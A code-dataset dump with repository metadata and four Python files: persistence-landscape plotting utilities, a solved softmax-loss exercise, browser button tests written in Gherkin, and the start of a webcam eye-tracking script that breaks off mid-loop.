hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
972afb3d4c0738dfd67ed2bca6fd1dce5f4ad90d
| 9,782
|
py
|
Python
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 67
|
2018-10-03T18:46:25.000Z
|
2022-01-27T19:45:30.000Z
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 47
|
2018-08-09T15:29:08.000Z
|
2022-02-28T19:45:06.000Z
|
persim/landscapes/visuals.py
|
DeliciousHair/persim
|
4702251c22d4fffbb1c29409f466745c6b6c26c5
|
[
"MIT"
] | 33
|
2018-08-09T17:34:47.000Z
|
2021-10-01T13:41:21.000Z
|
"""
Visualization methods for plotting persistence landscapes.
"""
import itertools
from operator import itemgetter
import matplotlib as mpl
from matplotlib import cm
import matplotlib.pyplot as plt
import numpy as np
from .base import PersLandscape
from .exact import PersLandscapeExact
from .approximate import PersLandscapeApprox
# Render all figure text with LaTeX so the $\lambda$ labels below typeset
# correctly.  NOTE(review): this requires a working TeX installation on the
# user's machine at import time -- confirm this is intended as a hard
# module-level requirement.
mpl.rcParams["text.usetex"] = True
# Public API of this module; the remaining plotters are implementation details.
__all__ = ["plot_landscape", "plot_landscape_simple"]
def plot_landscape(
    landscape: PersLandscape,
    num_steps: int = 3000,
    colormap="default",
    title=None,
    labels=None,
    ax=None,
):
    """
    Plot landscape functions in 3d.

    Dispatches to the exact or approximate plotter based on the concrete
    type of ``landscape``; returns None for any other type.
    """
    # All keyword arguments are forwarded unchanged to whichever concrete
    # plotter matches the landscape type.
    forwarded = dict(
        landscape=landscape,
        num_steps=num_steps,
        colormap=colormap,
        title=title,
        labels=labels,
        ax=ax,
    )
    if isinstance(landscape, PersLandscapeApprox):
        return plot_landscape_approx(**forwarded)
    if isinstance(landscape, PersLandscapeExact):
        return plot_landscape_exact(**forwarded)
def plot_landscape_simple(
    landscape: PersLandscape,
    alpha=1,
    padding=0.1,
    num_steps=1000,
    title=None,
    ax=None,
):
    """
    Plot landscape functions with the fast 2d plotters.

    Dispatches on the concrete landscape type; returns None for any other
    type, mirroring the 3d ``plot_landscape`` dispatcher.
    """
    if isinstance(landscape, PersLandscapeExact):
        # The exact plotter draws critical pairs directly, so padding and
        # num_steps are not forwarded.
        return plot_landscape_exact_simple(
            landscape=landscape, alpha=alpha, title=title, ax=ax
        )
    if isinstance(landscape, PersLandscapeApprox):
        forwarded = dict(
            landscape=landscape,
            alpha=alpha,
            padding=padding,
            num_steps=num_steps,
            title=title,
            ax=ax,
        )
        return plot_landscape_approx_simple(**forwarded)
def plot_landscape_exact(
    landscape: PersLandscapeExact,
    num_steps: int = 3000,
    colormap="default",
    alpha=0.8,
    labels=None,
    padding: float = 0.1,
    depth_padding: float = 0.7,
    title=None,
    ax=None,
):
    """
    A 3d plot of the exact persistence landscape.

    Warning: This function is quite slow, especially for large landscapes.

    Parameters
    ----------
    num_steps: int, default 3000
        number of sampled points that are plotted
    colormap, default "default"
        matplotlib style sheet used for the plot
    alpha, default 0.8
        transparency of shading
    labels, default None
        currently unused; accepted for interface compatibility
    padding: float, default 0.1
        amount of empty grid shown to left and right of landscape functions
    depth_padding: float, default 0.7
        amount of space between sequential landscape functions
    title, default None
        figure title
    ax, default None
        a 3d matplotlib axis to draw on; a new figure/axis is created when None
    """
    plt.style.use(colormap)
    if ax is None:
        # Figure.gca(projection=...) was deprecated in matplotlib 3.4 and
        # removed in 3.6; add_subplot is the supported replacement.  This
        # also makes the previously-ignored `ax` argument effective.
        fig = plt.figure()
        ax = fig.add_subplot(projection="3d")
    landscape.compute_landscape()
    # itemgetter index selects which entry to take max/min wrt.
    # the hanging [0] or [1] takes that entry.
    crit_pairs = list(itertools.chain.from_iterable(landscape.critical_pairs))
    min_crit_pt = min(crit_pairs, key=itemgetter(0))[0]  # smallest birth time
    max_crit_pt = max(crit_pairs, key=itemgetter(0))[0]  # largest death time
    max_crit_val = max(crit_pairs, key=itemgetter(1))[1]  # largest peak of landscape
    min_crit_val = min(crit_pairs, key=itemgetter(1))[1]  # smallest peak of landscape
    norm = mpl.colors.Normalize(vmin=min_crit_val, vmax=max_crit_val)
    scalarMap = mpl.cm.ScalarMappable(norm=norm)
    # x-axis for grid
    domain = np.linspace(
        min_crit_pt - padding * 0.1, max_crit_pt + padding * 0.1, num=num_steps
    )
    # for each landscape function
    for depth, level in enumerate(landscape):
        # sequential critical pairs of this landscape function
        xs, zs = zip(*level)
        image = np.interp(domain, xs, zs)
        for x, z in zip(domain, image):
            if z == 0.0:
                # skip zeros so flat regions are not drawn
                continue
            # shade from the z=0 plane up (or down) to the function value
            ztuple = [0, z] if z > 0.0 else [z, 0]
            # for coloring https://matplotlib.org/3.1.0/tutorials/colors/colormapnorms.html
            ax.plot(
                [x, x],  # plotting a vertical line to get a shaded function
                [depth_padding * depth, depth_padding * depth],
                ztuple,
                linewidth=0.5,
                alpha=alpha,
                c=scalarMap.to_rgba(z),
            )
            ax.plot([x], [depth_padding * depth], [z], "k.", markersize=0.1)
    ax.set_ylabel("depth")
    if title:
        plt.title(title)
    ax.view_init(10, 90)
    plt.show()
def plot_landscape_exact_simple(
    landscape: PersLandscapeExact, alpha=1, title=None, ax=None
):
    """
    A simple 2d plot of the persistence landscape. This is a faster plotting
    utility than the standard plotting, but is recommended for smaller
    landscapes for ease of visualization.

    Parameters
    ----------
    alpha, default 1
        transparency of shading
    title, default None
        axis title
    ax, default None
        matplotlib axis to draw on; the current axis is used when None
    """
    ax = ax or plt.gca()
    landscape.compute_landscape()
    # NOTE: the original computed min/max critical points and values here but
    # never used them; that dead code has been removed.
    for depth, level in enumerate(landscape):
        pts = np.array(level)
        # raw string: "\l" in a plain literal is an invalid escape sequence
        # (DeprecationWarning, SyntaxError in future Python versions)
        ax.plot(pts[:, 0], pts[:, 1], label=rf"$\lambda_{{{depth}}}$", alpha=alpha)
    ax.legend()
    if title:
        ax.set_title(title)
def plot_landscape_approx(
    landscape: PersLandscapeApprox,
    num_steps: int = 3000,
    colormap="default",
    labels=None,
    alpha=0.8,
    padding: float = 0.1,
    depth_padding: float = 0.7,
    title=None,
    ax=None,
):
    """
    A 3d plot of the approximate persistence landscape.

    Warning: This function is quite slow, especially for large landscapes.

    Parameters
    ----------
    num_steps: int, default 3000
        number of sampled points that are plotted
    colormap, default "default"
        matplotlib style sheet used for the plot
    labels, default None
        currently unused; accepted for interface compatibility
    alpha, default 0.8
        transparency of shading
    padding: float, default 0.1
        amount of empty grid shown to left and right of landscape functions
    depth_padding: float, default 0.7
        amount of space between sequential landscape functions
    title, default None
        figure title
    ax, default None
        a 3d matplotlib axis to draw on; a new figure/axis is created when None
    """
    plt.style.use(colormap)
    if ax is None:
        # Figure.gca(projection=...) was deprecated in matplotlib 3.4 and
        # removed in 3.6; add_subplot is the supported replacement.  This
        # also makes the previously-ignored `ax` argument effective.
        fig = plt.figure()
        ax = fig.add_subplot(projection="3d")
    landscape.compute_landscape()
    # Flatten all sampled values to find the global color range.
    _vals = list(itertools.chain.from_iterable(landscape.values))
    norm = mpl.colors.Normalize(vmin=min(_vals), vmax=max(_vals))
    scalarMap = mpl.cm.ScalarMappable(norm=norm)
    # x-axis for grid
    domain = np.linspace(
        landscape.start - padding * 0.1, landscape.stop + padding * 0.1, num=num_steps
    )
    # Grid on which the landscape itself was sampled; loop-invariant, so it
    # is computed once here instead of once per depth.
    sample_grid = np.linspace(
        start=landscape.start, stop=landscape.stop, num=landscape.num_steps
    )
    # for each landscape function
    for depth, level in enumerate(landscape):
        image = np.interp(domain, sample_grid, level)
        for x, z in zip(domain, image):
            if z == 0.0:
                # skip zeros so flat regions are not drawn
                continue
            # shade from the z=0 plane up (or down) to the function value
            ztuple = [0, z] if z > 0.0 else [z, 0]
            # for coloring https://matplotlib.org/3.1.0/tutorials/colors/colormapnorms.html
            ax.plot(
                [x, x],  # plotting a vertical line to get a shaded function
                [depth_padding * depth, depth_padding * depth],
                ztuple,
                linewidth=0.5,
                alpha=alpha,
                c=scalarMap.to_rgba(z),
            )
            ax.plot([x], [depth_padding * depth], [z], "k.", markersize=0.1)
    ax.set_ylabel("depth")
    if title:
        plt.title(title)
    ax.view_init(10, 90)
    plt.show()
def plot_landscape_approx_simple(
    landscape: PersLandscapeApprox,
    alpha=1,
    padding=0.1,
    num_steps=1000,
    title=None,
    ax=None,
):
    """
    A simple 2d plot of the persistence landscape. This is a faster plotting
    utility than the standard plotting, but is recommended for smaller
    landscapes for ease of visualization.

    Parameters
    ----------
    alpha, default 1
        transparency of shading
    padding: float, default 0.1
        amount of empty grid shown to left and right of landscape functions
    num_steps: int, default 1000
        currently unused (each function is drawn on its own sample grid);
        accepted for interface compatibility
    title, default None
        axis title
    ax, default None
        matplotlib axis to draw on; the current axis is used when None
    """
    ax = ax or plt.gca()
    landscape.compute_landscape()
    # NOTE: the original flattened landscape.values to compute min/max here
    # but never used them; that dead code has been removed.
    for depth, level in enumerate(landscape):
        # depth-specific domain sized to this function's sample count
        domain = np.linspace(
            landscape.start - padding * 0.1,
            landscape.stop + padding * 0.1,
            num=len(level),
        )
        # raw string: "\l" in a plain literal is an invalid escape sequence
        ax.plot(domain, level, label=rf"$\lambda_{{{depth}}}$", alpha=alpha)
    ax.legend()
    if title:
        ax.set_title(title)
| 30.191358
| 178
| 0.617052
| 1,231
| 9,782
| 4.8026
| 0.174655
| 0.023004
| 0.012179
| 0.02977
| 0.833051
| 0.79753
| 0.772497
| 0.766576
| 0.722091
| 0.705853
| 0
| 0.019903
| 0.286036
| 9,782
| 323
| 179
| 30.28483
| 0.826604
| 0.317011
| 0
| 0.739796
| 0
| 0
| 0.019878
| 0.009861
| 0
| 0
| 0
| 0.006192
| 0
| 1
| 0.030612
| false
| 0
| 0.045918
| 0
| 0.096939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
973b82b21d0255df7c34489d439b6a8bf6c24f11
| 6,053
|
py
|
Python
|
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | 1
|
2022-02-06T19:35:05.000Z
|
2022-02-06T19:35:05.000Z
|
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | null | null | null |
assignment1/comp411/classifiers/softmax.py
|
kukalbriiwa7/COMP511_CS231n
|
1537e98cdca43fad906e56a22f48d884523414b0
|
[
"MIT"
] | null | null | null |
from builtins import range
import numpy as np
from random import shuffle
from past.builtins import xrange
def softmax_loss_naive(W, X, y, reg, regtype='L2'):
    """
    Softmax loss function, naive implementation (with loops)

    Inputs have dimension D, there are C classes, and we operate on minibatches
    of N examples.

    Inputs:
    - W: A numpy array of shape (D, C) containing weights.
    - X: A numpy array of shape (N, D) containing a minibatch of data.
    - y: A numpy array of shape (N,) containing training labels; y[i] = c means
      that X[i] has label c, where 0 <= c < C.
    - reg: (float) regularization strength
    - regtype: Regularization type: 'L2' (default); any other value uses L1

    Returns a tuple of:
    - loss as single float
    - gradient with respect to weights W; an array of same shape as W
    """
    # Initialize the loss and gradient to zero.
    loss = 0.0
    dW = np.zeros_like(W)

    #############################################################################
    # TODO: Compute the softmax loss and its gradient using explicit loops.     #
    # Store the loss in loss and the gradient in dW. If you are not careful     #
    # here, it is easy to run into numeric instability. Don't forget the        #
    # regularization! Implement both L1 and L2 regularization based on the      #
    # parameter regtype.                                                        #
    #############################################################################
    # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
    scores = X.dot(W)
    classes_count = W.shape[1]
    training_data_count = X.shape[0]

    # The data term (cross-entropy loss and its gradient) is identical for
    # both regularization types, so it is computed once here instead of
    # duplicating the whole loop in each branch as before.
    for i in range(training_data_count):
        # Shift scores so the row maximum is 0: exp() of a large positive
        # score overflows, and softmax is invariant to a constant shift.
        shifted = scores[i] - np.max(scores[i])
        softmax = np.exp(shifted) / np.sum(np.exp(shifted))
        loss -= np.log(softmax[y[i]])
        for j in range(classes_count):
            dW[:, j] += X[i] * softmax[j]
        dW[:, y[i]] -= X[i]
    loss /= training_data_count
    dW /= training_data_count

    if regtype == 'L2':
        loss += reg * np.sum(W * W)
        dW += 2 * reg * W
    else:
        # L1 subgradient: sign(W), with -1 chosen at W == 0 (matches the
        # original np.where(W > 0, ones, -1) behavior).
        loss += reg * np.sum(abs(W))
        dW += reg * np.where(W > 0, 1.0, -1.0)
    # *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
    return loss, dW
def softmax_loss_vectorized(W, X, y, reg, regtype='L2'):
    """
    Softmax loss function, vectorized version.

    Inputs and outputs are the same as softmax_loss_naive.
    """
    # Initialize the loss and gradient to zero.
    loss = 0.0
    dW = np.zeros_like(W)

    #############################################################################
    # TODO: Compute the softmax loss and its gradient using no explicit loops.  #
    # Store the loss in loss and the gradient in dW. If you are not careful     #
    # here, it is easy to run into numeric instability. Don't forget the        #
    # regularization! Implement both L1 and L2 regularization based on the      #
    # parameter regtype.                                                        #
    #############################################################################
    # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
    training_data_count = X.shape[0]
    scores = X.dot(W)
    # Shift each row so its maximum is 0 for numerical stability
    # (softmax is invariant to a per-row constant shift).
    shifted = scores - np.max(scores, axis=1, keepdims=True)

    # The data term is identical for both regularization types, so it is
    # computed once here instead of duplicating the block in each branch.
    exp_scores = np.exp(shifted)
    softmax_mat = exp_scores / exp_scores.sum(axis=1, keepdims=True)
    rows = np.arange(training_data_count)
    loss = np.sum(-np.log(softmax_mat[rows, y]))
    # d(loss)/d(scores) is softmax, minus 1 at each correct class.
    softmax_mat[rows, y] -= 1
    dW = X.T.dot(softmax_mat)
    loss /= training_data_count
    dW /= training_data_count

    if regtype == 'L2':
        loss += reg * np.sum(W * W)
        dW += 2 * reg * W
    else:
        # L1 subgradient: sign(W), with -1 chosen at W == 0 (matches the
        # original np.where(W > 0, ones, -1) behavior).
        loss += reg * np.sum(abs(W))
        dW += reg * np.where(W > 0, 1.0, -1.0)
    # *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
    return loss, dW
| 41.458904
| 258
| 0.570791
| 805
| 6,053
| 4.145342
| 0.192547
| 0.0911
| 0.091699
| 0.037758
| 0.795924
| 0.79053
| 0.764759
| 0.764759
| 0.764759
| 0.744381
| 0
| 0.008581
| 0.287626
| 6,053
| 145
| 259
| 41.744828
| 0.765306
| 0.35437
| 0
| 0.852941
| 0
| 0
| 0.002293
| 0
| 0
| 0
| 0
| 0.013793
| 0
| 1
| 0.029412
| false
| 0
| 0.058824
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
978340132361de39b4487cfa062c817b6599329d
| 4,147
|
py
|
Python
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 4
|
2016-05-02T02:14:08.000Z
|
2020-11-07T14:12:46.000Z
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 15
|
2016-01-20T22:57:31.000Z
|
2017-02-22T20:57:28.000Z
|
aloe_webdriver/tests/test_buttons.py
|
nikolas/aloe_webdriver
|
b1bad20eb6b899950186ad288315efc3e80cd959
|
[
"MIT"
] | 11
|
2016-02-06T14:08:49.000Z
|
2021-06-09T06:04:46.000Z
|
"""
Test a variety of different buttons.
"""
from aloe.testing import FeatureTest
from aloe_webdriver.tests.base import feature
# pylint:disable=line-too-long
class TestSteps(FeatureTest):
    """Test steps."""

    # Each method's docstring below is a Gherkin scenario.  NOTE(review):
    # the @feature() decorator appears to execute the docstring as an aloe
    # feature, so these docstrings are behavior, not documentation -- do not
    # reword them.  Every scenario visits the "button_page" fixture, presses
    # one button (located either by its element name, e.g. "submit_button",
    # or by its visible value, e.g. "Submit button"), and then asserts on
    # the confirmation text the page displays.

    @feature()
    def test_press_of_submit_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "submit_button"
        Then I should see "You pressed the submit button"
        """
    @feature()
    def test_press_of_submit_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Submit button"
        Then I should see "You pressed the submit button"
        """
    @feature()
    def test_press_of_reset_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "reset_button"
        Then I should see "You pressed the reset button"
        """
    @feature()
    def test_press_of_reset_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Reset button"
        Then I should see "You pressed the reset button"
        """
    @feature()
    def test_press_of_input_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "input_button"
        Then I should see "You pressed the input button"
        """
    @feature()
    def test_press_of_input_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Input button"
        Then I should see "You pressed the input button"
        """
    # Image buttons have no visible value, so only the by-name variant exists.
    @feature()
    def test_press_of_image_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "image_button"
        Then I should see "You pressed the image button"
        """
    @feature()
    def test_press_of_button_element_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "button_element"
        Then I should see "You pressed the button element"
        """
    @feature()
    def test_press_of_button_element_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Button element"
        Then I should see "You pressed the button element"
        """
    @feature()
    def test_press_of_anchor_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "anchor_button"
        Then I should see "You pressed the anchor button"
        """
    @feature()
    def test_press_of_anchor_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Anchor button"
        Then I should see "You pressed the anchor button"
        """
    @feature()
    def test_press_of_div_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "div_button"
        Then I should see "You pressed the div button"
        """
    @feature()
    def test_press_of_div_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Div button"
        Then I should see "You pressed the div button"
        """
    @feature()
    def test_press_of_span_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "span_button"
        Then I should see "You pressed the span button"
        """
    @feature()
    def test_press_of_span_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Span button"
        Then I should see "You pressed the span button"
        """
    @feature()
    def test_press_of_paragraph_button_by_name(self):
        """
        Given I visit test page "button_page"
        When I press "paragraph_button"
        Then I should see "You pressed the paragraph button"
        """
    @feature()
    def test_press_of_paragraph_button_by_value(self):
        """
        Given I visit test page "button_page"
        When I press "Paragraph button"
        Then I should see "You pressed the paragraph button"
        """
| 27.646667
| 60
| 0.611526
| 555
| 4,147
| 4.336937
| 0.09009
| 0.070627
| 0.098878
| 0.134192
| 0.927711
| 0.927711
| 0.925218
| 0.925218
| 0.873286
| 0.842958
| 0
| 0
| 0.308657
| 4,147
| 149
| 61
| 27.832215
| 0.839554
| 0.495057
| 0
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.459459
| false
| 0
| 0.054054
| 0
| 0.540541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
97cf98505d400230eb24c0b86a67eb76170d6faa
| 9,443
|
py
|
Python
|
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | 3
|
2017-09-18T14:43:16.000Z
|
2019-01-27T16:46:45.000Z
|
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | null | null | null |
eyetracker.py
|
coderrick/HopHacks2017
|
c99e1e23345bfc90c13ab68c9ac22d9d39ec9b83
|
[
"Apache-2.0"
] | null | null | null |
#Identify pupils. Based on beta 1
import numpy as np
import cv2
import time
import threading
import recorder
# Wall-clock reference used by start()/start_alone() to compute elapsed time.
start_time = time.time()
# NOTE(review): prev_time and STOP are assigned here but never read anywhere
# in this file -- possibly leftovers from an earlier revision.
prev_time = 0
STOP = False
# Shared accumulator of gaze-direction codes appended by start()/start_alone()
# and drained by end().
eyeMovement = []
def showImage(tempVar, pupilFrame):
    # Draw every detected circle onto pupilFrame (green outline plus a red
    # center dot) and display the annotated frame.
    # NOTE(review): tempVar[0, :] looks like cv2.HoughCircles output, i.e.
    # rows of (x, y, radius) -- confirm against the caller.
    for circle in tempVar[0, :]:
        center = (circle[0], circle[1])
        cv2.circle(pupilFrame, center, circle[2], (0, 255, 0), 2)
        cv2.circle(pupilFrame, center, 2, (0, 0, 255), 3)
    cv2.imshow("frame", pupilFrame)
def getDarkness(img):
    # Count the pixels in img whose intensity is strictly below 90.
    # img is anything np.asarray() accepts (e.g. a grayscale image region).
    # The original iterated every pixel in a Python double loop (O(rows*cols)
    # interpreter overhead); a single vectorized comparison is equivalent
    # and far faster.  int() keeps the plain-integer return type.
    return int((np.asarray(img) < 90).sum())
def process(quadrants):
    # Score each row of quadrant images: for every [left, right] pair,
    # produce [darkness(left), darkness(right)].  The result mirrors the
    # input layout with getDarkness() scores in place of the images.
    return [[getDarkness(row[0]), getDarkness(row[1])] for row in quadrants]
def replace(img, curr, max):
    # Fill img with a single gray level proportional to curr/max, scaled to
    # the 0-255 range, and return the filled array.  When img is already an
    # ndarray the fill happens in place, as in the original.
    # NOTE: the parameter name `max` shadows the builtin; it is kept for
    # interface compatibility with existing callers.
    data = np.asarray(img)
    # +0.0 forces float division (this file targets Python 2 semantics).
    color = ((curr + 0.0) / (max + 0.0)) * 255.0
    # Vectorized fill replaces the original per-pixel double loop; assigning
    # a float into an integer array truncates exactly as the element-wise
    # assignment did.
    data[...] = color
    return data
def end():
    # Finish a tracking session: hand back the direction codes collected so
    # far, reset the shared accumulator for the next session, and close all
    # OpenCV windows.
    global eyeMovement
    collected, eyeMovement = eyeMovement, []
    cv2.destroyAllWindows()
    return collected
def start(seconds, fileName):
    # Track eye movement through the webcam for `seconds` seconds while an
    # audio recorder runs on a daemon thread.  Direction codes are appended
    # to the module-level eyeMovement list and returned:
    #   0 = straight ahead, 1 = top left, 2 = top right,
    #   3 = bottom right, 4 = bottom left.
    # NOTE(review): `fileName` is accepted but never used; the recorder
    # output path is hard-coded to "input_sound.wav" -- confirm intent.
    thread = threading.Thread(target=recorder.record_on_button_press, args=("input_sound.wav",))
    thread.daemon = True  # Daemonize thread
    thread.start()
    cap = cv2.VideoCapture(0) #640,480
    w = 640
    h = 480
    # number of initial frames averaged into the per-quadrant darkness baseline
    testSize = 15
    curr_time = 0
    count = 0
    # [[top-left, top-right], [bottom-left, bottom-right]] darkness baseline
    baseline = np.array([[0,0],[0,0]])
    while(cap.isOpened() and curr_time < seconds):
        ret, frame = cap.read()
        #print curr_time
        #print "-------------"
        if ret==True:
            #downsample
            #frameD = cv2.pyrDown(cv2.pyrDown(frame))
            #frameDBW = cv2.cvtColor(frameD,cv2.COLOR_RGB2GRAY)
            #detect face
            frame = cv2.cvtColor(frame,cv2.COLOR_RGB2GRAY)
            frame = frame[0:700, 200:1000]
            # NOTE(review): the Haar cascade is reloaded from disk on every
            # frame; hoisting it above the loop would be cheaper.
            faces = cv2.CascadeClassifier('haarcascade_eye.xml')
            detected = faces.detectMultiScale(frame, 1.3, 5)
            #faces = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
            # detected2 = faces.detectMultiScale(frameDBW, 1.3, 5)
            pupilFrame = frame
            pupilO = frame
            #
            windowClose = np.ones((5,5),np.uint8)
            windowOpen = np.ones((2,2),np.uint8)
            windowErode = np.ones((2,2),np.uint8)
            # draw square
            for (x,y,w,h) in detected:
                cv2.rectangle(frame, (x,y), ((x+w),(y+h)), (0,0,255),1)
